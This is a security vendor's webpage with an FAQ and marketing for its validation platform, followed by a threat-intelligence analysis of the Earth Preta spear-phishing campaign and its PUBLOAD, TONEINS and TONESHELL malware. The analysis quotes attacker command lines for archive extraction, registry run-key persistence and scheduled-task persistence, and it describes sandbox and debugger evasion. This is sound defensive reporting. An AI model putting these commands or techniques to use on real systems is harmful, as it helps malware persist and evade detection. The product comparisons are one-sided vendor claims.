What is the Earth Preta spear-phishing campaign and who does it target?

The Earth Preta spear-phishing campaign is a sophisticated cyberattack that targets government offices, especially those working with Myanmar, as well as organizations in the education and research sectors worldwide. The campaign uses stolen documents as decoys and spear-phishing emails with embedded Google Drive links to trick victims into downloading and executing malicious files. The attacks have a higher concentration in the Asia Pacific region but affect organizations globally.

How do Earth Preta attackers deliver their malware to victims?

Earth Preta attackers use spear-phishing emails with embedded Google Drive or Dropbox links. These emails often use decoy topics related to international events or sensational subjects to lure victims. The malicious archives delivered via these links contain malware families such as TONEINS, TONESHELL, and PUBLOAD, often disguised as legitimate files.

What malware families are associated with the Earth Preta campaign?

The Earth Preta campaign is associated with the PUBLOAD, TONEINS, and TONESHELL malware families. PUBLOAD acts as a stager to download additional payloads, TONEINS installs the TONESHELL backdoor, and TONESHELL serves as the main backdoor for persistent access and further exploitation.

What techniques do Earth Preta attackers use to evade detection?

Earth Preta attackers use several evasion techniques, including fake file extensions, sideloading malicious DLLs with legitimate executables, using compromised email accounts, and employing anti-sandbox and anti-debugging methods such as custom exception handlers and window interaction checks. These techniques help them bypass security controls and slow down investigations.

How does the Earth Preta campaign establish persistence on infected systems?

The campaign establishes persistence by adding registry run keys and creating scheduled tasks that execute the malicious payloads at regular intervals. For example, PUBLOAD and TONESHELL use Windows Task Scheduler and registry modifications to ensure their malware runs automatically after system reboots.

What role do decoy documents play in the Earth Preta spear-phishing attacks?

Decoy documents are used to trick victims into believing the malicious files are legitimate. These documents often relate to ongoing international events or official communications, increasing the likelihood that recipients will open the files and inadvertently execute the malware.

How do Earth Preta attackers use email headers to evade detection?

Attackers place fake email addresses in the 'To' header and the real victims' addresses in the 'CC' header. This tactic helps evade automated security analysis and slows down investigations, as the emails appear less suspicious to security tools and analysts.

What anti-analysis techniques are used in the TONESHELL malware?

TONESHELL uses obfuscation, custom exception handlers, and anti-sandbox techniques such as checking for window interaction to avoid detection and analysis. The malware delays execution until it detects human interaction, making it harder for automated sandboxes to analyze its behavior.

How does Cymulate help organizations defend against spear-phishing and advanced malware campaigns like Earth Preta?

Cymulate's Exposure Management Platform enables organizations to simulate real-world attack scenarios, including spear-phishing and malware campaigns, to validate their defenses. By running continuous automated attack simulations, Cymulate helps identify vulnerabilities, test security controls, and prioritize remediation efforts to reduce the risk of successful attacks like Earth Preta.

What resources does Cymulate offer for understanding and mitigating spear-phishing threats?

Cymulate provides whitepapers, technical guides, and case studies focused on exposure management, threat validation, and email-based threats. Notable resources include the 'Exposure Management Platform and CTEM Whitepaper' and 'The Stress from Email-based Threats' guide, which offer practical insights for defending against spear-phishing attacks. Explore Cymulate's resources .

What features does Cymulate offer for exposure management and threat validation?

Cymulate offers continuous threat validation, breach and attack simulation (BAS), continuous automated red teaming (CART), exposure analytics, attack path discovery, cloud validation, and an extensive threat library with daily updates. These features help organizations proactively identify and remediate vulnerabilities across their environments. Learn more about Cymulate's platform .

Does Cymulate support integration with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including EDR and anti-malware solutions (e.g., CrowdStrike Falcon, Cisco Secure Endpoint), SIEM platforms (e.g., CrowdStrike Falcon LogScale), cloud security tools (e.g., AWS GuardDuty, Check Point CloudGuard), network security (e.g., Akamai Guardicore), and vulnerability management (e.g., CrowdStrike Falcon Spotlight). See the full list of integrations .

How does Cymulate's 'Threat (IoC) updates' feature improve threat resilience?

Cymulate's 'Threat (IoC) updates' feature provides recommended Indicators of Compromise (IoCs) that can be exported and applied directly to security controls. This enables control owners to quickly build defenses against new threats, improving overall threat resilience. IoCs can be exported via the UI or API in plain text or STIX format. (Source: EM Platform Message Guide)

What technical documentation is available for Cymulate users?

Cymulate offers a range of technical resources, including whitepapers, guides, solution briefs, data sheets, and industry reports. These resources cover topics such as exposure management, CTEM, vulnerability management, detection engineering, and threat validation. Access Cymulate's technical documentation .

How does Cymulate help with exposure prioritization and remediation?

Cymulate automates threat validation and prioritization, ranking vulnerabilities based on exploitability, business context, and threat intelligence. This enables organizations to focus remediation efforts on the most critical exposures, improving operational efficiency and reducing risk. Learn more .

What is Cymulate's approach to cloud security validation?

Cymulate provides dedicated validation features for hybrid and cloud environments, enabling organizations to assess and optimize their cloud security controls. Integrations with cloud security tools and automated testing help address the unique challenges of cloud complexity. Learn more about cloud validation .

How does Cymulate support detection engineering and SIEM optimization?

Cymulate streamlines detection engineering by enabling users to build, validate, and optimize threat detections at scale. The platform includes features for SIEM rule mapping and continuous validation, helping organizations improve mean time to detect and respond to threats. Read the solution brief .

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across organizations of all sizes and industries. It is especially valuable for organizations seeking to improve visibility, automate threat validation, and prioritize remediation. Learn more about target roles .

What business impact can customers expect from using Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, 40X faster threat validation, and a 52% reduction in critical exposures. These outcomes are supported by case studies such as Hertz Israel and Nemours Children's Health. Read the Hertz Israel case study .

How easy is it to implement Cymulate and start using it?

Cymulate is known for its quick and straightforward implementation. It operates in agentless mode, requiring no additional hardware or complex configurations. Customers can start running simulations almost immediately, and robust support is available to ensure a smooth onboarding process. (Source: Customer testimonials)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive and user-friendly platform. Security professionals highlight the ease of implementation, actionable insights, and the platform's ability to quickly identify and address security gaps. (Source: Customer testimonials)

What pain points does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volumes, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers. The platform provides continuous threat validation, actionable insights, and unified exposure management to solve these challenges. Learn more .

Are there case studies showing Cymulate's effectiveness for different industries?

Yes, Cymulate features case studies across industries such as financial services, healthcare, energy, and retail. Examples include Hertz Israel (cyber risk reduction), Nemours Children's Health (improved detection), and a sustainable energy company (cloud compliance automation). Browse Cymulate case studies .

How does Cymulate tailor its solutions for different security roles?

Cymulate addresses the unique needs of CISOs, SecOps teams, red teams, and vulnerability management teams by providing role-specific metrics, automation, and actionable insights. Each persona benefits from features designed to solve their specific pain points. Learn more about role-based solutions .

What security and compliance certifications does Cymulate hold?

Cymulate is certified for SOC2 Type II, ISO 27001:2013 (Information Security Management), ISO 27701 (Privacy Information Management), ISO 27017 (Cloud Services Security), and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to security, privacy, and cloud compliance. Learn more about Cymulate's security .

How does Cymulate ensure data protection and privacy?

Cymulate adopts a holistic approach to GDPR, employs a dedicated privacy and security team, and hosts services in secure AWS data centers. Data is encrypted in transit (TLS 1.2+) and at rest (AES-256), and the platform follows a strict Secure Development Lifecycle (SDLC) with regular audits and penetration tests. Read more about data protection .

What is Cymulate's company background and industry recognition?

Cymulate was founded in 2016 and serves over 1,000 customers in 50 countries. The company is recognized as a leader in cybersecurity, with a mission to revolutionize proactive security management. Cymulate has been named a Customers' Choice in the 2025 Gartner Peer Insights and a market leader by Frost & Sullivan. Learn more about Cymulate .

What is Cymulate's vision and mission?

Cymulate's vision is to revolutionize cybersecurity by fostering a proactive approach to managing threats. The mission is to empower organizations to manage their security posture effectively and improve resilience against evolving threats. Read about Cymulate's mission .

What is Cymulate's pricing model?

Cymulate operates on a subscription-based pricing model tailored to each organization's needs. Pricing depends on the selected package, number of assets, and scenarios for testing. For a personalized quote, schedule a demo with Cymulate .

How does Cymulate compare to AttackIQ?

AttackIQ provides automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. Cymulate offers a more comprehensive threat scenario library and advanced AI-powered features, making it easier to use and more effective for improving security posture. Read more .

How does Cymulate compare to Mandiant Security Validation?

Mandiant is an original BAS platform but has seen less innovation in recent years. Cymulate continually innovates with AI and automation and has expanded into exposure management, offering a more advanced and comprehensive solution. Read more .

How does Cymulate compare to Pentera?

Pentera focuses on attack path validation but lacks the depth of Cymulate's full exposure validation platform, which covers the entire kill chain and includes cloud control validation. Read more .

How does Cymulate compare to Picus Security?

Picus Security offers BAS with on-prem options but does not provide Cymulate's comprehensive exposure validation, full kill chain coverage, or cloud control validation. Read more .

How does Cymulate compare to SafeBreach?

SafeBreach provides breach and attack simulation but lacks Cymulate's innovation, precision, and automation. Cymulate offers a full CTEM solution, comprehensive exposure validation, and advanced automation with the industry's largest attack library. Read more .

How does Cymulate compare to Scythe?

Scythe is designed for advanced red teams to build custom attack campaigns but lacks Cymulate's ease of use, continuous validation, and actionable remediation guidance. Cymulate provides automated, no-code workflows, daily threat updates, and specific mitigation guidance. Read more .

Earth Preta Spear-Phishing Governments Worldwide

November 20, 2022

The attackers use the stolen documents as decoys to trick the targeted organizations working with Myanmar government offices into downloading and executing the malicious files. The victimology covers a broad range of organizations and verticals worldwide, with a higher concentration in the Asia Pacific region. Apart from the government offices with collaborative work in Myanmar, subsequent victims included the education and research industries, among others. In addition to decoy topics covering ongoing international events concerning specific organizations, the attackers also lure individuals with subject headings pertaining to pornographic materials. Earth Preta uses spear-phishing emails as its first step for intrusion. As aforementioned, some of the emails' subjects and contents discuss geopolitical topics, while others might contain sensational subjects. Analysts observed that all the emails Analysts analyzed had the Google Drive links embedded in them, which points to how users might be tricked into downloading the malicious archives. The file types of the archives include compressed files such as .rar, .zip, and .jar, to name a few. Upon accessing the links, Analysts learned that the archives contain the malware TONEINS, TONESHELL, and PUBLOAD malware families. We analyzed the contents of the emails and observed that a Google Drive link is used as a lure for victims. The email's subject might be empty or might have the same name as the malicious archive. Rather than add the victims' addresses to the email's "To" header, the threat actors used fake emails. Meanwhile, the real victims' addresses were written in the "CC" header, likely to evade security analysis and slow down investigations. Using open-source intelligence (OSINT) tool GHunt to probe those Gmail addresses in the "To" section, Analysts found these fake accounts with little information in them. Moreover, Analysts observed that some of the senders might be compromised email accounts from a specific organization. Victims might be convinced that these mails were sent from trusted partners, increasing the chances that recipients will select the malicious links. We also found some decoy documents linked to the organizations related to or working with Myanmar government entities. The first decoy's file name is Assistance and Recovery(china).exe, while another decoy .PDF document with title, that can be translated as "Embassy of the Republic of Myanmar" was observed in a compressed file named Assistance and Recovery(china).rar. Allegedly, this is a document containing the ambassador's report in rough meeting schedules between the embassies of Myanmar and China. We observed at least three types of arrival vectors as the intrusions' entry points, including over 30 lure archives around the world distributed via Google Drive links, Dropbox links, or other IP addresses hosting the files. In most of the archives Analysts collected, there are legitimate executables, as well as the sideloaded DLL. The names of the archives and the decoy documents vary in each case. In the following sections, Analysts take some of them as examples and share the TTPs of each. Inside the archive, the "~" file is a lure document. The executable Increasingly confident US is baiting China.exe is a legitimate executable (originally named adobe_licensing_wf_helper.exe, which is the Adobe Licensing WF Helper). This executable will sideload the malicious libcef.dll and trigger the export function cef_api_hash. When executed for the first time, the executable tries to install the malware by copying the .exe file and moving libcef.dll (detected by Trend Micro as Trojan.Win32.PUBLOAD) to Both .exe and .dll files will be renamed C:UsersPublicPicturesadobe_wf.exe and C:UsersPublicPictureslibcef.dll, respectively. Additionally, "~" is renamed as 05-09-2022.docx and dropped to the Desktop. The malicious archive contains three files: New Word Document.lnk, putty.exe, and CefBrowser.dll. In particular, the DLL and executable files are placed in multiple layers of folders named "_". The threat actor utilizes the .lnk file to install the malicious files by decompressing the archive file with WinRAR. The full command line is as follows. %ComSpec% /c "______putty.exe||(forfiles /P %APPDATA%.... /S /M Desktop.rar /C "cmd /c (c:progra~1winrarwinrar.exe x -inul -o+ @path||c:progra~2winrarwinrar.exe x -inul -o+ @path)&&______putty.exe")" Pputty.exe is masquerading as a normal executable; its original file name is AppXUpdate.exe. When it is executed, it sideloads CefBrowser.dll and executes the main routine in its export function, CCefInterface::SubProcessMain. It also abuses schtasks for persistence. There are also fake file extensions. libcef.dll (detected by Trend Micro as Trojan.Win32.TONEINS) is an installer for the next-stage malware. It copies two files with names starting with "~", in this case, ~$20220817.docx and ~$20220617(1).docx to . Both files have fake file extensions and masquerade as the temporary files generated while opening Microsoft Office software. In this campaign, Analysts identified the following malware used, namely PUBLOAD, TONEINS, and TONESHELL. PUBLOAD is a stager that can download the next-stage payload from its command-and-control (C&C) server. This malware was first disclosed by Cisco Talos in May 2022. Once the .dll is executed, it first checks if the same process is already running by calling OpenEventA. According to the tweet posted by Barberousse, some noteworthy event names are identified as usernames of other cybersecurity researchers on Twitter, such as "moto_sato", "xaacrazyman_armyCIAx," and "JohnHammondTeam." It is important to note that these researchers have nothing to do with PUBLOAD but were simply and intentionally mentioned by the threat actors in the binaries. PUBLOAD creates a directory in and drops all the malware, including the malicious DLL and the legitimate executable, into the directory. It then tries to establish persistence in one of the following ways: 1. Adding a registry run key cmd.exe /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Graphics /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\Graphics\AdobeLicensing.exe"" /f 2. Creating a schedule task schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR C:\Users\Public\Libraries\Graphics\AdobeLicensing.exe PUBLOAD malware decrypts the shellcode in AES algorithm in memory. The shellcode is invoked by creating a thread or using different APIs. The APIs can accept an argument of a callback function, working as an alternative to trigger the shellcode. Analysts observed several leveraged APIs including GrayStringW, EnumDateFormatsA, and LineDDA, and can be considered as a technique to bypass antivirus monitoring and detection. The decrypted PUBLOAD shellcode collects the computer name and the username as the payload of the first beacon. The payload will then be encrypted with the predefined RC4 (Rivest Cipher 4) key. As of this writing, all the stagers Analysts have seen so far share the same key. After the encryption, the stager uses a specific byte sequence as its packet's header. It prepends the magic bytes "17 03 03" and the payload size before the encrypted data. The stager also checks if the response packet has the same magic header, "17 03 03". If so, the downloaded payload in memory will be treated as a piece of shellcode and will be executed directly. Trojan.Win32.TONEINS is the installer for TONESHELL backdoors. The installer drops the TONESHELL malware to the %PUBLIC% folder and establishes the persistence for it. TONEINS malware usually comes in the lure archives, and in most cases, the name of the TONEINS DLL is libcef.dll. The malicious routine is triggered via calling its export function cef_api_hash. The TONEINS malware is obfuscated, likely to slow down malware analysis. It contains a lot of junk codes in its control flow and has plenty of useless XOR instructions as though to imply that these are used to decode strings. Upon checking, Analysts found that these obfuscated codes were reused from an open-source repository. The installer establishes the persistence for TONESHELL backdoors by using the following schtasks command: schtasks /create /sc minute /mo 2 /tn "ServiceHub.TestWindowStoreHost" /tr "C:UsersPublicPicturesServiceHub.TestWindowStoreHost.exe" /f Based on our observations, the file names for the dropped TONESHELL malware differ in case, and so do the names of the scheduled tasks. After persistence is established, TONESHELL then copies the legitimate executable and the malicious DLL to the %PUBLIC% folder, wherein both files have names that start with "~" in the lure archive. The TONESHELL malware is the main backdoor used in this campaign. It is a shellcode loader that loads and decodes the backdoor shellcode with a 32-byte key in memory. In the earlier version of TONESHELL, it has the capabilities from TONEINS malware, including establishing persistence and installing backdoors. However, the more recent version of TONESHELL is a standalone backdoor without any installer capabilities (such as the file ~$Talk points.docx). It is also obfuscated in a similar fashion to TONEINS malware, indicating that the actors continue to update the arsenal and separate the tools in order to bypass detection. In order to make sure that the TONESHELL is installed correctly, Backdoor.Win32.TONESHELL first checks if the process path matches the expected one. If so, the malicious code could be triggered by the custom exception handler. Interestingly, the adversary hides the actual code flow with the implementation of custom exception handlers. Different exception handlers will be invoked based on the result of the process name check, continuing the malicious routine by triggering the exception with the call _CxxThrowException. After it is invoked, the C++ runtime will find the corresponding exception handler from the ThrowInfo structure all the way down to the CatchProc member in the _msRttiDscr structure, which contains the real malicious codes. In this sample, the exception handler is located at the offset 0x10005300. This technique not only hides the execution flow but also stops the execution of the analyst's debugger. Looking at more recent TONESHELL samples, Analysts noticed that a new anti-sandbox technique is added compared to the earlier versions. The newer versions invoke the GetForegroundWindow API twice and check if there is any window switch. If the environment is a sandbox, both calls will get the same window handle because there is no human interaction involved in most sandboxes, resulting in the foreground window not changing. In addition, as an anti-sandbox and delayed execution technique, the malicious routine can only be triggered if the foreground window has already been switched for the fifth time. After the malicious exception handler is triggered, it starts to decode the next-stage TONESHELL shellcode. To decode the shellcode, it first decodes a 32-byte key in XOR operations with 0x7D, and the key will then be used to decode the shellcode body.

Featured Resources

View More Resources

blog

Handala Hack: From Regional Disruption to Digital Destruction — Why Security Validation Matters Now

After years of battling ransomware and financially motivated threats, security teams must now increase their focus to defend against digital destruction. Iranian-backed Handala Hack highlighted the growing threat with its claimed attacks against a U.S.-based medical equipment maker, with reports of widespread deletion of data